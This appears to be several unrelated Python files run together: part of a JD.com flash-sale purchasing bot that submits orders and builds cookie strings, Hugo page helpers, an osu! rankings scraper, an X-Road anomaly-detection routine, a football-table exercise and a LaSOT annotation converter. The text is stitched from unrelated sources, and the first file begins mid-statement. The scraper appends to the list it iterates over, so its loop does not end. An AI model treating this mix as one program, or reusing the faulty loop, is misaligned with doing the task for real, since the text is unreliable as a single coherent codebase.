'noStockSkuIds': 'xxx', 'reqInfo': None, 'hasJxj': False, 'addedServiceList': None, 'cartXml': None, 'sign': None, 'pin': 'xxx', 'needCheckCode': False, 'success': False, 'resultCode': 600158, 'orderId': 0, 'submitSkuNum': 0, 'deductMoneyFlag': 0, 'goJumpOrderCenter': False, 'payInfo': None, 'scaleSkuInfoListVO': None, 'purchaseSkuInfoListVO': None, 'noSupportHomeServiceSkuList': None, 'msgMobile': None, 'addressVO': {'oldAddress': False, 'mapping': False, 'pin': 'xxx', 'areaName': '', 'provinceId': xx, 'cityId': xx, 'countyId': xx, 'townId': xx, 'paymentId': 0, 'selected': False, 'addressDetail': 'xxxx', 'mobile': 'xxxx', 'idCard': '', 'phone': None, 'email': None, 'selfPickMobile': None, 'selfPickPhone': None, 'provinceName': None, 'cityName': None, 'countyName': None, 'townName': None, 'giftSenderConsigneeName': None, 'giftSenderConsigneeMobile': None, 'gcLat': 0.0, 'gcLng': 0.0, 'coord_type': 0, 'longitude': 0.0, 'latitude': 0.0, 'selfPickOptimize': 0, 'consigneeId': 0, 'selectedAddressType': 0, 'newCityName': None, 'newCountyName': None, 'newTownName': None, 
'checkLevel': 0, 'optimizePickID': 0, 'pickType': 0, 'dataSign': 0, 'overseas': 0, 'areaCode': None, 'nameCode': None, 'appSelfPickAddress': 0, 'associatePickId': 0, 'associateAddressId': 0, 'appId': None, 'encryptText': None, 'certNum': None, 'addressType': 0, 'fullAddress': 'xxxx', 'postCode': None, 'addressDefault': False, 'addressName': None, 'selfPickAddressShuntFlag': 0, 'pickId': 0, 'pickName': None, 'pickVOselected': False, 'mapUrl': None, 'branchId': 0, 'canSelected': False, 'siteType': 0, 'helpMessage': None, 'tipInfo': None, 'cabinetAvailable': True, 'limitKeyword': 0, 'specialRemark': None, 'siteProvinceId': 0, 'siteCityId': 0, 'siteCountyId': 0, 'siteTownId': 0, 'skuSupported': False, 'addressSupported': 0, 'isCod': 0, 'consigneeName': None, 'pickVOname': None, 'shipmentType': 0, 'retTag': 0, 'tagSource': 0, 'userDefinedTag': None, 'newProvinceId': 0, 'newCityId': 0, 'newCountyId': 0, 'newTownId': 0, 'newProvinceName': None, 'used': False, 'address': None, 'name': 'xx', 'message': None, 'id': 0}, 'msgUuid': None, 'message': 'xxxxxx商品无货'} # 下单成功 # {'overSea': False, 'orderXml': None, 'cartXml': None, 'noStockSkuIds': '', 'reqInfo': None, 'hasJxj': False, 'addedServiceList': None, 'sign': None, 'pin': 'xxx', 'needCheckCode': False, 'success': True, 'resultCode': 0, 'orderId': 8740xxxxx, 'submitSkuNum': 1, 'deductMoneyFlag': 0, 'goJumpOrderCenter': False, 'payInfo': None, 'scaleSkuInfoListVO': None, 'purchaseSkuInfoListVO': None, 'noSupportHomeServiceSkuList': None, 'msgMobile': None, 'addressVO': None, 'msgUuid': None, 'message': None} if resp_json.get('success'): order_id = resp_json.get('orderId') logger.info('订单提交成功! 订单号:%s', order_id) if self.send_message: self.messenger.send(text='jd-assistant 订单提交成功', desp='订单号:%s' % order_id) return True else: message, result_code = resp_json.get('message'), resp_json.get('resultCode') if result_code == 0: message = message + '(下单失败)' # self._save_invoice() # message = message + '(下单商品可能为第三方商品,将切换为普通发票进行尝试)' elif result_code == 60077: message = message + '(可能是购物车为空 或 未勾选购物车中商品)' elif result_code == 60123: message = message + '(需要在config.ini文件中配置支付密码)' elif result_code == 600158: logger.info('订单提交失败, 错误码:%s, 返回信息:%s', result_code, message) logger.info(f'很抱歉,您抢购的商品无货!本次抢购结束') return True logger.info('订单提交失败, 错误码:%s, 返回信息:%s', result_code, message) logger.info(f'响应数据:\n{resp_json}') return False except Exception as e: logger.error(e) return False self.request_info['submit_order_request'] = submit_order_request def make_seckill_connect(self): # 获取商品抢购链接请求(多种,目前添加2种) self.socket_client.init_pool("itemko.jd.com", 443, 1, 20) self.socket_client.init_pool("item-soa.jd.com", 443, 1, 20) # 访问商品抢购链接请求 self.socket_client.init_pool("yushou.jd.com", 443, 1, 10) # 访问抢购订单结算页面请求方法 # 获取秒杀初始化信息请求 self.socket_client.init_pool("marathon.jd.com", 443, 1, 10) # 【兼容】购物车请求 self.socket_client.init_pool("cart.jd.com", 443, 1, 10) # 提交抢购(秒杀)订单请求 self.socket_client.init_pool("trade.jd.com", 443, 1, 10) def make_reserve_seckill_connect(self): self.socket_client.init_pool("cart.jd.com", 443, 1) self.socket_client.init_pool("trade.jd.com", 443, 1, 15) def connect_now(self): self.socket_client.connect() def close_now(self): self.socket_client.close_client() def get_and_update_cookies_str(self): cookie_array = [] for cookie in iter(self.sess.cookies): cookie_array.append(f'{cookie.name}={cookie.value};') self.cookies_str = ''.join(cookie_array) return self.cookies_str def get_cookies_str_by_domain_or_path(self, domain=None, path=None): cookie_array = [] if domain is None: 
if path is None: for cookie in iter(self.sess.cookies): cookie_array.append(f'{cookie.name}={cookie.value};') else: for cookie in iter(self.sess.cookies): if cookie.path == path: cookie_array.append(f'{cookie.name}={cookie.value};') elif path is None: if domain is None: for cookie in iter(self.sess.cookies): cookie_array.append(f'{cookie.name}={cookie.value};') else: for cookie in iter(self.sess.cookies): if cookie.domain in domain: cookie_array.append(f'{cookie.name}={cookie.value};') else: for cookie in iter(self.sess.cookies): if ( (cookie.domain in domain) and (cookie.path == path) ): cookie_array.append(f'{cookie.name}={cookie.value};') return ''.join(cookie_array) def start_by_config(self, config=global_config): if config.select_mode == 1: # 执行【预约抢购,不会自动加入购物车】 self.exec_seckill_by_time(config) elif config.select_mode == 2: # 执行【预约抢购,自动加入购物车】 手动清空自动添加到购物车的 self.exec_reserve_seckill_by_time(config)
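# ----------------------------------------------------------------------------
# Illustrative sketch (not part of the assistant above): the fast-mode request
# helpers pass cookies=self.get_cookies_str_by_domain_or_path('marathon.jd.com'),
# i.e. a pre-rendered "name=value;" Cookie string filtered by domain/path rather
# than a cookie jar object. The standalone function below mirrors that filtering
# with a plain requests session so the behaviour can be checked in isolation;
# the name cookies_header_for and the example cookies are invented for the sketch.
import requests


def cookies_header_for(session: requests.Session, domain=None, path=None) -> str:
    """Render the session's cookies as a 'name=value;' string, optionally filtered."""
    parts = []
    for cookie in session.cookies:
        # same substring check as the original: a cookie set on '.jd.com'
        # matches a request to 'marathon.jd.com'
        if domain is not None and cookie.domain not in domain:
            continue
        if path is not None and cookie.path != path:
            continue
        parts.append(f'{cookie.name}={cookie.value};')
    return ''.join(parts)


if __name__ == '__main__':
    s = requests.Session()
    s.cookies.set('a', '1', domain='.jd.com', path='/')
    s.cookies.set('b', '2', domain='marathon.jd.com', path='/')
    # both cookies are included for marathon.jd.com, none for an unrelated host
    print(cookies_header_for(s, domain='marathon.jd.com'))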
#!/usr/bin/env python3 # -*- coding: utf-8 -*- """Hugo helpers.""" import yaml from datetime import datetime import hashlib r""" # Set type to 'posts' if you want to render page as blogpost type = "posts" # Set page weight to re-arrange items in file-tree menu. weight = 10 # Set how many table of contents levels to be showed on page. geekdocToC = 3 # Set a description for the current page. This will be shown in toc-trees objects. geekdocDescription = # Set false to hide the whole left navigation sidebar. Beware that it will make # navigation pretty hard without adding some kind of on-page navigation. geekdocNav = true # Show a breadcrumb navigation bar at the top of each docs page. geekdocBreadcrumb = false # Set source repository location. geekdocRepo = "https://github.com/thegeeklab/hugo-geekdoc" # Enable "Edit this page" links. Requires 'GeekdocRepo' param and path must point # to 'content' directory of repo. geekdocEditPath = "edit/main/exampleSite/content" # Used for 'Edit this page' link, set to '.File.Path' by default. # Can be overwritten by a path relative to 'geekdocEditPath' geekdocFilePath = # Set to mark page as flat section (file-tree menu only). geekdocFlatSection = true # Set true to hide page or section from side menu (file-tree menu only). geekdocHidden = true # Set false to show this page as a file-tree menu entry when you want it to be hidden in the sidebar. # NOTE: Only applies when 'geekdocHidden = true'. geekdocHiddenTocTree = true # Set to true to make a section foldable in side menu. geekdocCollapseSection = true # Add an anchor link to headlines. geekdocAnchor = true # If you have protected some pages with e.g. basic authentication you may want to exclude these pages # from data file, otherwise information may be leaked. Setting this parameter to 'true' will exclude the # page from search data, feeds, etc. # WARNING: Consider hosting a standalone, fully auth-protected static page for secret information instead! geekdocProtected = false # Set 'left' (default), 'center' or 'right' to configure the text align of a page. 
geekdocAlign = "left" """ class Page(object): def __init__(self, title, description): self.weight = 99 self.type = None # type: str self.geekdocFlatSection = None # type: bool self.geekdocCollapseSection = None # type: bool self.geekdocAnchor = None # type: bool self.geekdocProtected = None # type: bool self.geekdocEditPath = None # type: str self.geekdocRepo = None # type: str self.geekdocToC = None # type: int self.geekdocBreadcrumb = None # type: bool self.geekdocNav = None # type: bool self.geekdocHidden = None # type: bool self.geekdocHiddenTocTree = None # type: bool self.geekdocFilePath = None # type: bool self.geekdocAlign = "left" self.title = title self.description = description self.geekdocDescription = description self.body = "" # @property # def date(self): # return datetime.utcnow().strftime("%Y-%m-%dT%H:%M:%SZ") @property def content(self): hdict = {} for i in dir(self): if i.startswith("_"): continue if i in ["content", "body"]: continue aval = getattr(self, i) if callable(aval): continue if isinstance(aval, str): val = aval if not val: val = None elif isinstance(aval, dict): val = aval if not val: val = None else: try: val = list(iter(aval)) if not val: val = None except TypeError: val = aval if val is None: continue hdict[i] = val dump_fmt = yaml.safe_dump(hdict) return f""" --- {dump_fmt} --- {self.body} """.lstrip() class Tab(object): def __init__(self): self.tabs = [] def add_tab(self, tab_name: str, content: str): self.tabs.append( "\n".join( [ '{{< tab "__name__" >}}'.replace("__name__", tab_name), content, "{{< /tab >}}", ] ) ) @property def id(self): return hashlib.md5("".join(self.tabs).encode()).hexdigest() @property def content(self): ret = [] ret.append('{{< tabs "__" >}}'.replace("__", self.id)) ret.append("\n".join(self.tabs)) ret.append("{{< /tabs >}}") return "\n".join(ret) class ShortCode(object): @classmethod def _hint(cls, txt, hint_type: str): return "\n".join( [ f"{{{{< hint {hint_type} >}}}}", txt, "{{< /hint >}}", ] ) @classmethod def hint_ok(cls, txt): return cls._hint(txt, "ok") @classmethod def hint_info(cls, txt): return cls._hint(txt, "info") @classmethod def hint_warning(cls, txt): return cls._hint(txt, "warning") @classmethod def hint_danger(cls, txt): return cls._hint(txt, "danger") @classmethod def icon(cls, icon_name): return f"{{{{< icon {icon_name} >}}}}" @classmethod def button_relative(cls, txt, link): out = [] out.append(f'{{{{< button relref="{link}" >}}}}') out.append(txt) out.append("{{< /button >}}") return "\n".join(out) @classmethod def button_external(cls, txt, link): out = [] out.append(f'{{{{< button href="{link}" >}}}}') out.append(txt) out.append("{{< /button >}}") return "\n".join(out) @classmethod def expand(cls, content, label=None): out = [] if label: out.append('{{< expand "__" "..." 
>}}'.replace("__", label)) else: out.append("{{< expand >}}") out.append(content) out.append("{{< /expand >}}") return "\n".join(out) @classmethod def _video(cls, url: str, vid_type: str): txt = [] standalone = " ".join(["controls"]) attribs = " ".join( [ f'{k}="{v}"' for k, v in { "autoplay": "true", "loop": "true", }.items() ] ) txt.append('<div class="video-container">') txt.append(f"<video {standalone} {attribs}>") txt.append(f'<source src="{url}" type="video/{vid_type}">') txt.append("</video>") txt.append("</div>") return "\n".join(txt) @classmethod def webm(cls, url): return cls._video(url, "webm") @classmethod def mp4(cls, url): return cls._video(url, "mp4") @classmethod def code(cls, body, lang=""): txt = [] txt.append("") txt.append(f"```{lang}") txt.append(body) txt.append("```") txt.append("") return "\n".join(txt) @classmethod def quote_bold(cls, txt: str): return "\n".join([f"> **{i}**" if i else "> " for i in txt.splitlines()]) @classmethod def quote(cls, txt: str): return "\n".join([f"> {i}" if i else "> " for i in txt.splitlines()])
''' 主程序 @author: PurePeace @time: 2020年2月10日 02:03:09 ''' import time, datetime, re, requests, random, json from bs4 import BeautifulSoup requests.adapters.DEFAULT_RETRIES = 999 # 增加重连次数 # get now timeString or timeStamp def getTime(needFormat=0, formatMS=True): if needFormat != 0: return datetime.datetime.now().strftime(f'%Y-%m-%d %H:%M:%S{r".%f" if formatMS else ""}') else: return time.time() # breakTime:每爬一页休息几秒 def getPage(country='CN', index=1, breakTime=1, datas=[], startTime=0): if datas != None and len(datas) > 0: #print(f'[{getTime(1)}]:已获取第{index}页数据共{len(datas)}条,耗时:{round(getTime()-startTime, 3)}s.\n') return datas time.sleep(breakTime + random.random()) header = {'User-Agent': 'Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1'} #print(f'[{getTime(1)}]:正在获取第{index}页数据...') startTime = getTime() try: page = requests.get(f'https://osu.ppy.sh/rankings/osu/performance?country={country}&page={index}', headers=header, timeout=30) soup = BeautifulSoup(page.text, 'lxml') datas = soup.find_all('tr', attrs={'class':'ranking-page-table__row'}) except: datas = [] if len(datas) == 0 or datas == None: #print(f'[{getTime(1)}]:获取第{index}页数据时失败,稍后进行重试...') time.sleep(breakTime * 3 + random.random()) return getPage(country, index, breakTime, datas, startTime) def userData(pageData, index=0): needs = ('rank','acc','pc','pp','ss','s','a') number = re.compile(r'\d+\.?\d*') se = pageData[index].find_all('td', attrs={'class': 'ranking-page-table__column'}) user = se.pop(1).find('a', attrs={'class': 'ranking-page-table__user-link-text js-usercard'}) userid = user.attrs.get('data-user-id') username = user.text.strip() data = { k: number.findall(se[i].text.replace(',',''))[0] for i, k in enumerate(needs) } data['username'], data['userid'] = username, userid if 'ranking-page-table__row--inactive' in pageData[index].attrs['class']: data['status'] = 'inactive' else: data['status'] = 'active' return data def fetchData(startPage=1, endPage=1, country='CN'): from concurrent.futures import ThreadPoolExecutor, wait, ALL_COMPLETED data = [] print(f'[{getTime(1)}]:开始工作,抓取行政区:[{country}];起始页:{startPage},结束页:{endPage}\n') #for idx in range(startPage, endPage+1): # thisPage = getPage(country, index=idx) # userDatas = [userData(thisPage, index=i) for i in range(len(thisPage))] # data.append({'country': country, 'page': idx, 'data': userDatas, 'time': getTime(1)}) def getDone(f): thisPage = f.result() userDatas = [userData(thisPage, index=i) for i in range(len(thisPage))] data.append({'country': country, 'page': idx, 'data': userDatas, 'time': getTime(1)}) print(f'\r当前任务已完成({len(data)}/{endPage-startPage+1})', end='') with ThreadPoolExecutor(max_workers=16) as executor: tasks = [] for idx in range(startPage, endPage + 1): ft = executor.submit(getPage, country, index=idx) ft.add_done_callback(getDone) tasks.append(ft) wait(tasks, return_when=ALL_COMPLETED) return {'data': data, 'country': country, 'time': getTime(1)} # country: # '' == global ranking; # 'CN', 'US, 'UK' ... 
== country ranking def getRankings(country=''): startPage=60 endPage=100 sstart = time.time() print(f'开始排行榜!起始:{startPage},终止:{endPage},地区:{country}') data = fetchData(startPage=startPage, endPage=endPage, country=country) print('完毕。') return data if __name__ == '__main__': # go data = getRankings() # fix data print('开始处理玩家...') players = [] for page in data['data']: for player in page['data']: players.append(player) #print(player['userid']) print('完毕,全部玩家:', len(players)) # request local api to get player data, and calculate cost print('开工...') tries = 0 for p in players: try: tries += 1 print(f'[{tries}] do -> ',p['userid']) dstart = time.time() r = requests.get('http://127.0.0.1:8989/player/{}'.format(p['userid']), timeout=120) d = r.json() ddone = time.time() - dstart if d.get('status') == 0: print(f'[{tries}] sb(0) -> ', p['userid'], f' ({ddone})s') players.append(p) print(f'[{tries}] done -> ',p['userid'], f' ({ddone})s') except: ddone = time.time() - dstart print(f'[{tries}] sb(1) -> ', p['userid'], f' ({ddone})s') players.append(p) print('任务完成,总用时:', time.time() - sstart, 's')
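# A minimal, self-contained sketch (not part of the script above) of one way to keep each
# fetched result paired with the page it came from when using a thread pool: the getDone
# callback above closes over the loop variable idx, so recording the index at submit time
# avoids depending on that closure. fetch_page is a hypothetical stand-in for getPage.
from concurrent.futures import ThreadPoolExecutor, as_completed

def fetch_page(index):
    # placeholder fetch so the sketch runs on its own; a real version would do the HTTP call
    return {'rows': [], 'fetched_page': index}

def fetch_range(start_page, end_page, workers=16):
    results = []
    with ThreadPoolExecutor(max_workers=workers) as executor:
        # remember which page index each future was submitted with
        futures = {executor.submit(fetch_page, i): i for i in range(start_page, end_page + 1)}
        for future in as_completed(futures):
            page_index = futures[future]
            results.append({'page': page_index, 'data': future.result()})
    # sort by page so output order does not depend on completion order
    return sorted(results, key=lambda r: r['page'])

if __name__ == '__main__':
    print(fetch_range(1, 3))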
# The MIT License # Copyright (c) 2021- Nordic Institute for Interoperability Solutions (NIIS) # Copyright (c) 2017-2020 Estonian Information System Authority (RIA) # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in # all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN # THE SOFTWARE. import traceback from opmon_analyzer.analyzer_conf import DataModelConfiguration from .AnalyzerDatabaseManager import AnalyzerDatabaseManager from .models.FailedRequestRatioModel import FailedRequestRatioModel from .models.DuplicateMessageIdModel import DuplicateMessageIdModel from .models.TimeSyncModel import TimeSyncModel from .models.AveragesByTimeperiodModel import AveragesByTimeperiodModel from . import constants from .logger_manager import LoggerManager from . import __version__ import time import datetime import numpy as np def find_anomalies_main(settings): logger_m = LoggerManager(settings['logger'], settings['xroad']['instance'], __version__) try: db_manager = AnalyzerDatabaseManager(settings) logger_m.log_info('_tmp_find_anomalies_start', "Process started ...") find_anomalies(settings, db_manager, logger_m) except Exception: logger_m.log_error("find_anomalies_main", traceback.format_exc()) def find_anomalies(settings, db_manager, logger_m): current_time = datetime.datetime.now() n_anomalies = 0 config = DataModelConfiguration(settings) # add first request timestamps for service calls that have appeared logger_m.log_info('_tmp_find_anomalies_1', "Add first request timestamps for service calls that have appeared ...") logger_m.log_heartbeat("Checking if completely new service calls have appeared", 'SUCCEEDED') db_manager.add_first_request_timestamps_from_clean_data() logger_m.log_info('_tmp_find_anomalies_1', "Add first request timestamps ... 
Done!") logger_m.log_info('_tmp_find_anomalies_2', "Anomaly types 4.3.1-4.3.3 ...") for model_type, time_window in config.time_windows.items(): logger_m.log_info('_tmp_find_anomalies_2', f"Finding {model_type} anomalies, aggregating by {time_window}...") logger_m.log_heartbeat(f"Finding {model_type} anomalies, aggregating by {time_window}", 'SUCCEEDED') start = time.time() last_transform_date = db_manager.get_timestamp(ts_type="last_transform_timestamp", model_type=model_type) if last_transform_date is not None: last_transform_timestamp = last_transform_date.timestamp() * 1000 else: last_transform_timestamp = None buffer_time = settings['analyzer']['corrector-buffer-time'] current_transform_date = current_time - datetime.timedelta(minutes=buffer_time) residual = current_transform_date.timestamp() % (60 * time_window["agg_minutes"]) current_transform_timestamp = (current_transform_date.timestamp() - residual) * 1000 if model_type == "failed_request_ratio": model = FailedRequestRatioModel(settings) data = db_manager.aggregate_data(model_type=model_type, start_time=last_transform_timestamp, end_time=current_transform_timestamp, agg_minutes=time_window["agg_minutes"]) anomalies = model.transform(data, time_window) if len(anomalies) > 0: db_manager.insert_incidents(anomalies) n_anomalies = len(anomalies) elif model_type == "duplicate_message_ids": model = DuplicateMessageIdModel() data = db_manager.aggregate_data(model_type=model_type, start_time=last_transform_timestamp, end_time=current_transform_timestamp, agg_minutes=time_window["agg_minutes"]) anomalies = model.transform(data, time_window) if len(anomalies) > 0: db_manager.insert_incidents(anomalies) n_anomalies = len(anomalies) elif model_type == "time_sync_errors": model = TimeSyncModel() n_anomalies = 0 for metric, threshold in config.time_sync_monitored_lower_thresholds.items(): start = time.time() data = db_manager.aggregate_data(model_type=model_type, start_time=last_transform_timestamp, end_time=current_transform_timestamp, agg_minutes=time_window["agg_minutes"], metric=metric, threshold=threshold) anomalies = model.transform(data, metric, threshold, time_window) if len(anomalies) > 0: db_manager.insert_incidents(anomalies) n_anomalies += len(anomalies) t0 = np.round(time.time() - start, 2) logger_m.log_info('find_anomalies', f"{model_type} anomalies time: {t0} seconds.") if last_transform_date is not None: logger_m.log_info('find_anomalies', f"Used data between {last_transform_date} and {current_transform_date}.") else: logger_m.log_info('find_anomalies', f"Used data until {current_transform_date}") logger_m.log_info('find_anomalies', f"Found {n_anomalies} anomalies.") db_manager.set_timestamp(ts_type="last_transform_timestamp", model_type=model_type, value=datetime.datetime.fromtimestamp(current_transform_timestamp / 1000.0)) logger_m.log_info('_tmp_find_anomalies_2', "Anomaly types 4.3.1-4.3.3 ... Done!") logger_m.log_info('_tmp_find_anomalies_3', "Anomaly types 4.3.5 - 4.3.9. Comparison with historic averages ...") logger_m.log_heartbeat("Determining service call stages", 'SUCCEEDED') sc_regular, sc_first_incidents = db_manager.get_service_calls_for_transform_stages() logger_m.log_info( 'find_anomalies', f"No. 
service calls that have passed the training period for the first time: {len(sc_first_incidents)}" ) logger_m.log_info('find_anomalies', f"Number of service calls in regular mode: {len(sc_regular)}") for time_window, _ in config.historic_averages_time_windows: last_transform_date = db_manager.get_timestamp(ts_type="last_transform_timestamp", model_type=time_window['timeunit_name']) logger_m.log_info('_tmp_find_anomalies_3', f"Model type: {time_window['timeunit_name']}") if last_transform_date is not None: last_transform_timestamp = last_transform_date.timestamp() * 1000 else: last_transform_timestamp = None buffer_time = settings['analyzer']['corrector-buffer-time'] current_transform_date = current_time - datetime.timedelta(minutes=buffer_time) residual = current_transform_date.timestamp() % (60 * time_window["agg_window"]["agg_minutes"]) current_transform_timestamp = (current_transform_date.timestamp() - residual) * 1000 start = time.time() logger_m.log_info('_tmp_find_anomalies_3', f"Reading data and aggregating (model {time_window['timeunit_name']})") logger_m.log_heartbeat("Reading data and aggregating (model {time_window['timeunit_name']})", 'SUCCEEDED') data = db_manager.get_data_for_transform_stages( time_window["agg_window"]["agg_minutes"], last_transform_timestamp, current_transform_timestamp, sc_regular, sc_first_incidents ) if len(data) > 0: logger_m.log_info('_tmp_find_anomalies_3', "Loading the %s model" % time_window['timeunit_name']) logger_m.log_heartbeat("Loading the %s model" % time_window['timeunit_name'], 'SUCCEEDED') dt_model = db_manager.load_model(model_name=time_window['timeunit_name'], version=None) dt_model = dt_model.groupby(constants.service_identifier_column_names + ["similar_periods"]).first() averages_by_time_period_model = AveragesByTimeperiodModel(time_window, config, dt_model) logger_m.log_info('_tmp_find_anomalies_3', "Finding anomalies (model %s)" % time_window['timeunit_name']) logger_m.log_heartbeat("Finding anomalies (model %s)" % time_window['timeunit_name'], 'SUCCEEDED') anomalies = averages_by_time_period_model.transform(data) t0 = np.round(time.time() - start, 2) logger_m.log_info( 'find_anomalies', f"Averages by timeperiod ({time_window['timeunit_name']}) anomaly finding time: {t0} seconds." ) logger_m.log_info('find_anomalies', f"Used data between {last_transform_date} and {current_transform_date}.") logger_m.log_info('find_anomalies', f"Found {len(anomalies)} anomalies.") if len(anomalies) > 0: db_manager.insert_incidents(anomalies) logger_m.log_info('_tmp_find_anomalies_3', f"Updating last anomaly finding timestamp (model {time_window['timeunit_name']})") logger_m.log_heartbeat(f"Updating last anomaly finding timestamp (model {time_window['timeunit_name']})", 'SUCCEEDED') db_manager.set_timestamp(ts_type="last_transform_timestamp", model_type=time_window['timeunit_name'], value=datetime.datetime.fromtimestamp(current_transform_timestamp / 1000.0)) logger_m.log_info('_tmp_find_anomalies_3', "Anomaly types 4.3.5 - 4.3.9. Comparison with historic averages ... Done!") logger_m.log_info('_tmp_find_anomalies_4', "Incident timestamps ...") if len(sc_first_incidents) > 0: logger_m.log_heartbeat("Updating first incident timestamps", 'SUCCEEDED') db_manager.update_first_timestamps(field="first_incident_timestamp", value=current_time, service_calls=sc_first_incidents[constants.service_identifier_column_names]) logger_m.log_info('_tmp_find_anomalies_4', "Incident timestamps ... Done!") logger_m.log_info('_tmp_find_anomalies_end', "Process finished ... 
Done!")
# Ex073 tabela = ('Flamengo', 'Internacional', 'Atlético', 'São Paulo', 'Fluminense', 'Grêmio', 'Palmeiras', 'Santos', 'Atlético Paranaense', 'Red Bull Bragantino', 'Ceará', 'Conrinthians', 'Atlético GO', 'Bahia', 'Sport', 'Fortaleza', 'Vasco da Gama', 'Goias', 'Coritiba', 'Botafogo') cont = 0 while True: print(f'\033[m\033[7m{"BRASILEIRÃO 2021":^55}\033[m') print("""\033[7m[1]\033[m - Mostra todos os times na ordem da tabela \033[7m[2]\033[m - Mostra o G5 do Brasilerão \033[7m[3]\033[m - Mostra a zona de rebaixamento do Brasileirão \033[7m[4]\033[m - Mostra todos os times em ordem alfabética \033[7m[5]\033[m - Mostra a posição do Grêmio na tabela \033[7m[6]\033[m - Encerrar programa""") print(f'\033[m\033[7m{" ":^55}\033[m') choice = int(input('Escolha o que deseja mostrar: ')) if choice == 1: cont = 0 for times in tabela: cont += 1 if cont % 2 == 0: print('\033[31m', end='') else: print('\033[32m', end='') print(f'{cont}°-{times}') print('\033[m', end='') elif choice == 2: cont = 0 for times in range(0, 5): cont += 1 if cont % 2 == 0: print('\033[31m', end='') else: print('\033[32m', end='') print(f'{cont}°-{tabela[cont - 1]}') print('\033[m', end='') elif choice == 3: cont = 17 for times in range(0, 4): if cont % 2 == 0: print('\033[31m', end='') else: print('\033[32m', end='') print(f'{cont}°-{tabela[cont - 1]}') cont += 1 print('\033[m', end='') elif choice == 4: cont = 0 for times in sorted(tabela): cont += 1 if cont % 2 == 0: print('\033[31m', end='') else: print('\033[32m', end='') print(f'{cont}°-{times}') print('\033[m', end='') elif choice == 5: cont = 0 for times in tabela: cont += 1 print('\033[32m', end='') if times == 'Grêmio': print(f'{cont}°-{times}\033[m') elif choice == 6: break else: print(f'\033[7;31m{"COMANDO INVÁLIDO, TENTE NOVAMENTE":^55}\033[m')
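# An illustrative alternative (not part of the exercise above) to counting indices by hand,
# using tuple slicing and .index(); tabela is shortened here just to keep the sketch small.
tabela = ('Flamengo', 'Internacional', 'Atlético', 'São Paulo', 'Fluminense',
          'Grêmio', 'Palmeiras', 'Santos', 'Coritiba', 'Botafogo')

g5 = tabela[:5]                               # first five positions
ultimos_quatro = tabela[-4:]                  # last four positions of the tuple
posicao_gremio = tabela.index('Grêmio') + 1   # 1-based position in the table

print('G5:', g5)
print('Últimos quatro:', ultimos_quatro)
print(f'Grêmio está em {posicao_gremio}º lugar')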
import argparse import os.path as osp from collections import defaultdict import mmcv from tqdm import tqdm def parse_args(): parser = argparse.ArgumentParser( description='LaSOT test dataset to COCO Video format') parser.add_argument( '-i', '--input', help='root directory of LaSOT test dataset', ) parser.add_argument( '-o', '--output', help='directory to save coco formatted label file', ) return parser.parse_args() def convert_lasot_test(lasot_test, ann_dir, save_dir): """Convert lasot dataset to COCO style. Args: lasot_test (dict): The converted COCO style annotations. ann_dir (str): The path of lasot test dataset save_dir (str): The path to save `lasot_test`. """ records = dict(vid_id=1, img_id=1, ann_id=1, global_instance_id=1) videos_list = osp.join(ann_dir, 'testing_set.txt') videos_list = mmcv.list_from_file(videos_list) lasot_test['categories'] = [dict(id=0, name=0)] for video_name in tqdm(videos_list): video_path = osp.join(ann_dir, video_name) video = dict(id=records['vid_id'], name=video_name) lasot_test['videos'].append(video) gt_bboxes = mmcv.list_from_file( osp.join(video_path, 'groundtruth.txt')) full_occlusion = mmcv.list_from_file( osp.join(video_path, 'full_occlusion.txt')) full_occlusion = full_occlusion[0].split(',') out_of_view = mmcv.list_from_file( osp.join(video_path, 'out_of_view.txt')) out_of_view = out_of_view[0].split(',') img = mmcv.imread(osp.join(video_path, 'img/00000001.jpg')) height, width, _ = img.shape for frame_id, gt_bbox in enumerate(gt_bboxes): file_name = '%08d' % (frame_id + 1) + '.jpg' file_name = osp.join(video_name, 'img', file_name) image = dict( file_name=file_name, height=height, width=width, id=records['img_id'], frame_id=frame_id, video_id=records['vid_id']) lasot_test['images'].append(image) x1, y1, w, h = gt_bbox.split(',') ann = dict( id=records['ann_id'], image_id=records['img_id'], instance_id=records['global_instance_id'], category_id=0, bbox=[int(x1), int(y1), int(w), int(h)], area=int(w) * int(h), full_occlusion=full_occlusion[frame_id] == '1', out_of_view=out_of_view[frame_id] == '1') lasot_test['annotations'].append(ann) records['ann_id'] += 1 records['img_id'] += 1 records['global_instance_id'] += 1 records['vid_id'] += 1 mmcv.dump(lasot_test, osp.join(save_dir, 'lasot_test.json')) print('-----LaSOT Test Dataset------') print(f'{records["vid_id"]- 1} videos') print(f'{records["global_instance_id"]- 1} instances') print(f'{records["img_id"]- 1} images') print(f'{records["ann_id"] - 1} objects') print('-----------------------------') def main(): args = parse_args() lasot_test = defaultdict(list) convert_lasot_test(lasot_test, args.input, args.output) if __name__ == '__main__': main()
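# A hand-written example (values assumed) of the COCO-video style record that
# convert_lasot_test builds for a single video with one frame, to make the running-id
# bookkeeping (vid_id, img_id, ann_id, global_instance_id all starting at 1) easier to follow.
import json

example = {
    'categories': [{'id': 0, 'name': 0}],
    'videos': [{'id': 1, 'name': 'airplane-1'}],
    'images': [{'file_name': 'airplane-1/img/00000001.jpg', 'height': 720, 'width': 1280,
                'id': 1, 'frame_id': 0, 'video_id': 1}],
    'annotations': [{'id': 1, 'image_id': 1, 'instance_id': 1, 'category_id': 0,
                     'bbox': [367, 101, 40, 25], 'area': 40 * 25,
                     'full_occlusion': False, 'out_of_view': False}],
}

print(json.dumps(example, indent=2))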
